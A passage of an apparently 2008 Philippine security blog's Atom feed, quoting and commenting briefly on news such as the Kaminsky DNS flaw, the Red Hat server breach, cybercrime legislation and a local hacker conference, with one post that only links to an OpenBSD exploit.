&lt;em&gt;“convicted in federal court of computer hacking and placed on probation”&lt;/em&gt; (the statements were corrected in subsequent articles). Anderson used the hacker name “Lord Flathead.”"&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Actually this is quite common. In the Philippines did you know that linux luminaries R_____ and S_____ used to be members of a hacker group?&lt;/span&gt; &lt;span style="font-style: italic;"&gt;=)&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-5242482256102672525?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/5242482256102672525/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=5242482256102672525' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/5242482256102672525'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/5242482256102672525'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/09/myspace-cofounder-tom-anderson-was-real.html' title='MySpace Cofounder Tom Anderson Was A Real Life “WarGames” Hacker in 1980s'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-581924680617886566</id><published>2008-09-01T11:19:00.002+08:00</published><updated>2008-09-01T11:25:13.084+08:00</updated><title type='text'>DNS flaw redirects Internet users to wrong websites</title><content type='html'>&lt;a href="http://newsinfo.inquirer.net/breakingnews/infotech/view/20080831-157877/DNS-flaw-redirects-Internet-users-to-wrong-websites"&gt;http://newsinfo.inquirer.net/breakingnews/infotech/view/20080831-157877/DNS-flaw-redirects-Internet-users-to-wrong-websites&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;MANILA, Philippines -- A flaw in the Internet’s domain name system (DNS), first detected more than a month ago, is affecting Internet service providers (ISPs) and their customers, according to a local security expert.&lt;/p&gt; &lt;p&gt;Security researcher Dan Kaminsky first detected the flaw early July and discussed it at length at a security conference a month later, although it was thought to have been already exploited by hackers.&lt;/p&gt; &lt;p&gt;The problem concerns the DNS, which translates numerical IP addresses into Web addresses (URL) familiar to users. By typing in that address, such as www.inquirer.net, users do not have to wrangle with memorizing numerical IP addresses to input into their browsers.&lt;/p&gt; &lt;p&gt;Experts fear that the flaw is now being exploited in such a way that a user who enters a legitimate address may be redirected to a different site or worse, a bogus mirror site that's actually designed to gather sensitive information such as passwords and credit card numbers.&lt;/p&gt; &lt;p&gt;INQUIRER.net has received feedback from readers calling attention to local Web addresses that have been redirected instead to different sites.&lt;/p&gt; &lt;p&gt;Joey Santos, CEO of local security services provider NetX Technology Solutions, reported that at least two local banks have encountered possible DNS-related problems, in particular detecting email containing suspicious links to their respective websites.&lt;/p&gt; &lt;p&gt;"It could be isolated cases involving some of their employees. But nonetheless these banks are investigating it," Santos told INQUIRER.net via telephone.&lt;/p&gt; &lt;p&gt;Reports about the DNS flaw also advise Internet service providers (ISP) to protect mail servers and ensure they are accessing protected (or patched) DNS servers.&lt;/p&gt; &lt;p&gt;Local ISPs and service providers could not be reached for comment as of this writing.&lt;/p&gt; &lt;p&gt;The problem is, ISPs usually do not hold themselves accountable when it comes to security cases such as this which is presumably out of their control, according to Santos.&lt;/p&gt; &lt;p&gt;"Their SLAs (service level agreements) only cover connectivity and the usual issue (for the user) is speed," Santos said. "In the US, it is a bigger deal because customers pay a premium for added security services from their ISPs."&lt;/p&gt; &lt;p&gt;Major technology companies including Microsoft and Cisco have reportedly convened and are issuing appropriate patches to their products specific to this DNS problem. Security and anti-virus company Trend Micro has also blogged about this "DNS cache poisoning" flaw in July.&lt;/p&gt; &lt;p&gt;In its blog, it pointed out that it was the Unites States Computer Emergency Response Team that was first to &lt;a class="linkart" href="http://www.kb.cert.org/vuls/id/800113"&gt;published&lt;/a&gt; about this vulnerability, as it detailed the security implications and the possible vendors affected.&lt;/p&gt; &lt;p&gt;"While this is completely unrelated to any particular malware, there is a rather disconcerting DNS cache-poisoning vulnerability that has surfaced which deserves the attention of any and every organization on the planet which operates their own DNS servers," Paul Ferguson of Trend Micro's Internet Security Intelligence in Advanced Threats Research group &lt;a class="linkart" href="http://blog.trendmicro.com/major-dns-cache-poisoning-vulnerability-patch-now/"&gt;wrote&lt;/a&gt; as early as July 22.&lt;/p&gt; &lt;p&gt;"The importance of determining if you are vulnerable, and getting the vulnerability fixed quickly, is becoming more important as each days passes. This is due not only to the criticality of the vulnerability, but also due to some of the 'colorful' background in how some of the details have become available surrounding the vulnerability itself," he said.&lt;/p&gt; &lt;p&gt;User are also advised to go to this &lt;a class="linkart" href="http://www.doxpara.com/"&gt;website&lt;/a&gt; to check if DNS servers their browsers are using are prone to attacks.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-style: italic;"&gt;ISP's should get sued if one of their customers get scammed as a result of the ISP's not patching their servers =)&lt;/span&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-581924680617886566?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/581924680617886566/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=581924680617886566' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/581924680617886566'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/581924680617886566'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/09/dns-flaw-redirects-internet-users-to.html' title='DNS flaw redirects Internet users to wrong websites'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-5035414584542585790</id><published>2008-08-29T18:21:00.002+08:00</published><updated>2008-08-29T18:24:06.083+08:00</updated><title type='text'>Adrian Pastor meeting Captain Crunch</title><content type='html'>&lt;a href="http://www.gnucitizen.org/blog/viva-la-defcon/"&gt;http://www.gnucitizen.org/blog/viva-la-defcon/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://farm4.static.flickr.com/3161/2757586415_b2bedee3a0.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 200px;" src="http://farm4.static.flickr.com/3161/2757586415_b2bedee3a0.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Captain Crunch looks like he's high =)&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-5035414584542585790?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/5035414584542585790/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=5035414584542585790' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/5035414584542585790'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/5035414584542585790'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/08/adrian-pastor-meeting-captain-crunch.html' title='Adrian Pastor meeting Captain Crunch'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://farm4.static.flickr.com/3161/2757586415_b2bedee3a0_t.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-5787245704647936598</id><published>2008-08-26T09:50:00.001+08:00</published><updated>2008-08-26T09:53:07.634+08:00</updated><title type='text'>RP can’t do without policy on data privacy, security</title><content type='html'>&lt;a href="http://www.mb.com.ph/INFO20080826133382.html"&gt;http://www.mb.com.ph/INFO20080826133382.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Under no circumstances can the Philippines compete, let alone thrive, in the lucrative outsourcing market and the global marketplace without a fool-proof policy on data protection and security.&lt;br /&gt;&lt;br /&gt;This was the clear message sent out by participants in a recent conference dubbed "Mapping the Future of Information Security Forum" organized by the Information Systems Security Society of the Philippines (ISSSP) at a hotel in Makati City.&lt;br /&gt;&lt;br /&gt;Anthony Tuason, a director at consultancy firm PriceWaterhouseCoopers, said during his presentation that IT companies, most especially those in the BPO sector, cannot possibly institute "IT governance" — the process of using technology as to management tool to run an organization — in the workplace if security is being disregarded.&lt;br /&gt;&lt;br /&gt;"Innovation, value, and performance can be derived from IT governance (and) data privacy and security is one area that helps organizations achieve their IT governance objectives," Tuason said.&lt;br /&gt;&lt;br /&gt;Local BPO firms have a huge stake in this issue, Tuason said. "A company must understand both the impact of laws of the country where data originates and the laws of the Philippines where data is processed. Responsibility for compliance with the originating countries’ laws will rest with the company.’&lt;br /&gt;&lt;br /&gt;Industry groups such as the Business Processing Association of the Philippines (BPAP) and Philippine Internet Commerce Society (PICS) have urged the government to pass a law governing data privacy and security.&lt;br /&gt;&lt;br /&gt;The BPAP has actually partnered with the Commission on Information and Communications Technology (CICT) for a Technical Working Group (TWG) composed of representatives from the private and public sectors that would look into the pending bills on data privacy and security.&lt;br /&gt;&lt;br /&gt;The BPAP said that aside from pushing for the passage of the bills, it also would work for the appointment of a "privacy commissioner" who will act as the primary protector of data privacy rights against misuse and abuse by individuals, private organizations, and even the government.&lt;br /&gt;&lt;br /&gt;According to the National Cybersecurity Coordinator Virtus Gil, who was also a speaker during the ISSSP confab, the government has already laid down a strategy for national cybersecurity, which deals mostly to security threats against the country.&lt;br /&gt;&lt;br /&gt;The program, Gil said, has three goals: to reinforce current policy and operational measures to reduce vulnerability in the cyberspace under Philippine jurisdiction; to nurture a culture of cyber security amongst users and critical sectors; and to strengthen self-reliance in terms of information security technologies and human resources.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style:italic;"&gt;Buhay pa  pala ISSSP?&lt;br /&gt;We have a National Cybersecurity Coordinator?&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-5787245704647936598?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/5787245704647936598/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=5787245704647936598' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/5787245704647936598'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/5787245704647936598'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/08/rp-cant-do-without-policy-on-data.html' title='RP can’t do without policy on data privacy, security'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-8458856652897011862</id><published>2008-08-24T18:04:00.001+08:00</published><updated>2008-08-24T18:13:46.572+08:00</updated><title type='text'>Red Hat servers breached</title><content type='html'>&lt;a href="https://www.redhat.com/archives/fedora-announce-list/2008-August/msg00012.html"&gt;https://www.redhat.com/archives/fedora-announce-list/2008-August/msg00012.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://rhn.redhat.com/errata/RHSA-2008-0855.html"&gt;http://rhn.redhat.com/errata/RHSA-2008-0855.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Quotes;&lt;br /&gt;&lt;br /&gt;"Last week Red Hat detected an intrusion on certain of its computer systems&lt;br /&gt;and took immediate action. While the investigation into the intrusion is&lt;br /&gt;on-going, our initial focus was to review and test the distribution&lt;br /&gt;channel we use with our customers, Red Hat Network (RHN) and its associated&lt;br /&gt;security measures"&lt;br /&gt;&lt;br /&gt;"One of the compromised Fedora servers was a system used for signing&lt;br /&gt;Fedora packages."&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-8458856652897011862?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/8458856652897011862/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=8458856652897011862' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/8458856652897011862'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/8458856652897011862'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/08/httpswww.html' title='Red Hat servers breached'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-8410723405793042400</id><published>2008-08-24T16:37:00.001+08:00</published><updated>2008-08-24T16:40:19.838+08:00</updated><title type='text'>Help, there's a resident rootkit in the memory</title><content type='html'>&lt;a href="http://tipidpc.com/viewtopic.php?tid=159021"&gt;http://tipidpc.com/viewtopic.php?tid=159021&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The first ever publicly reported resident rootkit implanted in volatile memory =)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-8410723405793042400?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/8410723405793042400/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=8410723405793042400' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/8410723405793042400'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/8410723405793042400'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/08/help-theres-resident-rootkit-in-memory.html' title='Help, there&apos;s a resident rootkit in the memory'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-2624552948614865098</id><published>2008-08-20T17:10:00.001+08:00</published><updated>2008-08-20T17:12:11.819+08:00</updated><title type='text'>Hijack the Internet</title><content type='html'>&lt;a href="http://eng.5ninesdata.com/~tkapela/iphd-2.ppt"&gt;http://eng.5ninesdata.com/~tkapela/iphd-2.ppt&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;BGP. Scaaryy.. =)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-2624552948614865098?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/2624552948614865098/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=2624552948614865098' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/2624552948614865098'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/2624552948614865098'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/08/hijack-internet.html' title='Hijack the Internet'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-5104440279646881104</id><published>2008-08-20T09:20:00.003+08:00</published><updated>2008-08-20T09:34:51.184+08:00</updated><title type='text'>CICT endorses latest anti-cybercrime bill in Congress</title><content type='html'>&lt;a href="http://newsinfo.inquirer.net/breakingnews/infotech/view/20080818-155361/CICT-endorses-latest-anti-cybercrime-bill-in-Congress"&gt;http://newsinfo.inquirer.net/breakingnews/infotech/view/20080818-155361/CICT-endorses-latest-anti-cybercrime-bill-in-Congress&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;MANILA, Philippines -- The government's highest IT-governing body is hopeful that increased awareness and support will push lawmakers this time to finally pass a bill against cybercrime.&lt;br /&gt;&lt;br /&gt;In a statement, the Commission on Information and Communication Technology (CICT) said it has endorsed before Congress the "Cybercrime Prevention Act of 2008", which consolidates four cybercrime-related bills authored by different lawmakers.&lt;br /&gt;&lt;br /&gt;This consolidated bill also resulted from a technical working group created last year and spearheaded by the CICT and Department of Justice.&lt;br /&gt;&lt;br /&gt;In its Declaration of Policy, the bill authorizes the State, "to adopt sufficient powers to effectively prevent and combat such offenses by facilitating their detection, investigation, and prosecution at both the domestic and international levels, and by providing arrangements for fast and reliable international cooperation."&lt;br /&gt;&lt;br /&gt;The proposed bill defines various forms of cybercrime offenses and prescribes corresponding punishments. These offenses include hacking, identity theft, phishing, spamming, website defacement, denial-of-service (DoS) attacks, malware or viruses, child pornography and cyber prostitution.&lt;br /&gt;&lt;br /&gt;A representative from the Council of Europe also joined the technical working group in refining the bill further in order to "harmonize" it with European standards on cybersecurity.&lt;br /&gt;&lt;br /&gt;CICT commissioner Tim Diaz de Rivera is also counting on increased support from private sector groups this time, including the Business Process Association of the Philippines (B/PAP) which represents the outsourcing industry.&lt;br /&gt;&lt;br /&gt;"B/PAP, for example, is supporting it order to sell the country better to investors and ensure they are very wel covered when it comes to cybersecurity in the Philippines," Diaz de Rivera told INQUIRER.net.&lt;br /&gt;&lt;br /&gt;The CICT commissioner is also counting on increased awareness on the part of congressmen about IT and the need for the country to keep up with more progressive neighboring countries like Malaysia and Singapore when it comes to related legislation.&lt;br /&gt;&lt;br /&gt;Another proposed bill creating a national ICT department is also currently undergoing hearings at the Senate. The CICT is likewise hoping that increased support for the said bill will rub off on the anti-cybercrime bill.&lt;br /&gt;&lt;br /&gt;Diza de Rivera admitted previous versions of these bills fail to make it into law because of more pressing proposed laws being heard in the Senate and Lower House.&lt;br /&gt;&lt;br /&gt;Cybersecurity-related bills have been filed in Congress and Senate since four or five years ago without success.&lt;br /&gt;&lt;br /&gt;"Definitely there is increased support this time but it's really in the hands of lawmakers. We are always on-call if they need clarification about the proposed bill," Diaz de Rivera said.&lt;br /&gt;&lt;br /&gt;The latest anti-cybercrime bill also mandates the creation of a National Cyber Security Office, under the CICT, whose task is to formulate and implement a national cyber security plan.&lt;br /&gt;&lt;br /&gt;Some of its functions include the preparation and implementation of appropriate measures to prevent and suppress cybercrime offenses; the monitoring of investigations of cybercrime cases; the facilitation of international cooperation on cybercrime prevention and prosecution.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style:italic;"&gt;National Cyber Security Office. Apply kaya ako dito =)&lt;br /&gt;&lt;br /&gt;Next step would be Approved Standards and Frameworks for IT Implementations =)&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-5104440279646881104?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/5104440279646881104/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=5104440279646881104' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/5104440279646881104'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/5104440279646881104'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/08/cict-endorses-latest-anti-cybercrime.html' title='CICT endorses latest anti-cybercrime bill in Congress'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-9059229916374682901</id><published>2008-08-17T19:06:00.006+08:00</published><updated>2008-08-17T19:40:27.652+08:00</updated><title type='text'>Nuts about Security</title><content type='html'>&lt;a style="font-weight: bold;" href="http://hackacon.com/main.html"&gt;Hackacon&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;It was supposed to be held at SM Megamall but the venue got changed. Went by Megamall on the way home and saw the event there was the &lt;a href="http://sujiru.googlepages.com/08082008.jpg"&gt;National Coconut Week. &lt;/a&gt;If there was a disagreement between the hackacon organizers and the SM management I hope the latter didn't say "We could get bigger nuts than you people". =)&lt;br /&gt;&lt;br /&gt;The sessions I attended were actually quite good given the limited frame. I could imagine the impact and breadth of knowledge being gained by someone who hadn't dealt with the stuff  before.&lt;br /&gt;&lt;br /&gt;Overall these kind of cons are good for the local security scene.&lt;br /&gt;&lt;br /&gt;Biggest bummer was the &lt;a href="http://hackacon.com/contest.html"&gt;contest&lt;/a&gt; being cancelled.&lt;br /&gt;&lt;br /&gt;Got a cool shirt =)&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_z88lTJOxKPA/SKgMLqdseMI/AAAAAAAAABQ/f9GWVyca_5o/s1600-h/shirt.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://1.bp.blogspot.com/_z88lTJOxKPA/SKgMLqdseMI/AAAAAAAAABQ/f9GWVyca_5o/s200/shirt.jpg" alt="" id="BLOGGER_PHOTO_ID_5235447961335134402" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;There was a speaker named &lt;a href="http://hackacon.com/sessions.html"&gt;Wilbert Ontoy&lt;/a&gt;. I heard he got owned 2 days after the con. Maybe he taught them too much? Or too little? =)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-9059229916374682901?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/9059229916374682901/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=9059229916374682901' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/9059229916374682901'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/9059229916374682901'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/08/nuts-about-security.html' title='Nuts about Security'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_z88lTJOxKPA/SKgMLqdseMI/AAAAAAAAABQ/f9GWVyca_5o/s72-c/shirt.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-7906434209791787412</id><published>2008-07-09T13:36:00.003+08:00</published><updated>2008-07-09T13:52:25.710+08:00</updated><title type='text'>The hackers you must fear...</title><content type='html'>No, not the skiddies. These kind of people...&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.int.iol.co.za/index.php?set_id=1&amp;amp;click_id=13&amp;amp;art_id=vn20080703061212942C901462"&gt;http://www.int.iol.co.za/index.php?set_id=1&amp;amp;click_id=13&amp;amp;art_id=vn20080703061212942C901462&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;"He was the thorn in the side of South Africa's four giant banks whose top cyber experts were left red-faced every time he hacked through several security features and accessed their "secure" banking accounts."&lt;br /&gt;&lt;br /&gt;"In a single day on December 24 2005 he swiped R9,8-million from the account of a government department."&lt;br /&gt;&lt;br /&gt;"I never needed the money, I was a &lt;span style="font-weight: bold;"&gt;software architect&lt;/span&gt; for a computer company where I was earning R80 000 a month. What I was doing was just for fun. It was the thrill of being able to do it,"&lt;br /&gt;&lt;br /&gt;"...has a &lt;span style="font-weight: bold;"&gt;BSc degree in computer sciences&lt;/span&gt; from Rand Afrikaans University..."&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.fastcompany.com/magazine/127/nexttech-fear-of-a-black-hat.html"&gt;http://www.fastcompany.com/magazine/127/nexttech-fear-of-a-black-hat.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;"announced on a popular computer-security forum that he had 0days for Linux, &lt;span style="font-weight: bold;"&gt;HP-UX&lt;/span&gt; (the computer maker's popular Unix database software), &lt;span style="border-bottom: 1px dotted green;"&gt;Microsoft Windows&lt;/span&gt;, and Apache."&lt;br /&gt;&lt;br /&gt;"...who works full time at &lt;span style="font-weight: bold;"&gt;HP&lt;/span&gt;..."&lt;br /&gt;&lt;br /&gt;"...he saw nothing wrong with offering tools and techniques that targeted the company providing his paycheck..."&lt;br /&gt;&lt;br /&gt;"An HP spokeswoman admitted the company has a rogue employee in France and said it was investigating along with the FBI."&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-7906434209791787412?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/7906434209791787412/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=7906434209791787412' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/7906434209791787412'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/7906434209791787412'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/07/hackers-you-must-fear.html' title='The hackers you must fear...'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-606107634215721506</id><published>2008-07-01T22:29:00.002+08:00</published><updated>2008-07-01T22:39:00.542+08:00</updated><title type='text'>OpenBSD Local Exploit</title><content type='html'>&lt;a href="http://lul-disclosure.net/exploits/openbsdjizz.c"&gt;OpenBSD 4.0 local exploit&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;See the &lt;a href="http://lul-disclosure.net/lulz/openbsdjizz-the_movie.html"&gt;movie&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Brought to you by Lance M Havok aka &lt;a href="http://blog.washingtonpost.com/securityfix/2007/01/apple_patches_mac_wireless_sec.html"&gt;LMH&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-606107634215721506?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/606107634215721506/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=606107634215721506' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/606107634215721506'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/606107634215721506'/><link rel='alternate' type='text/html' 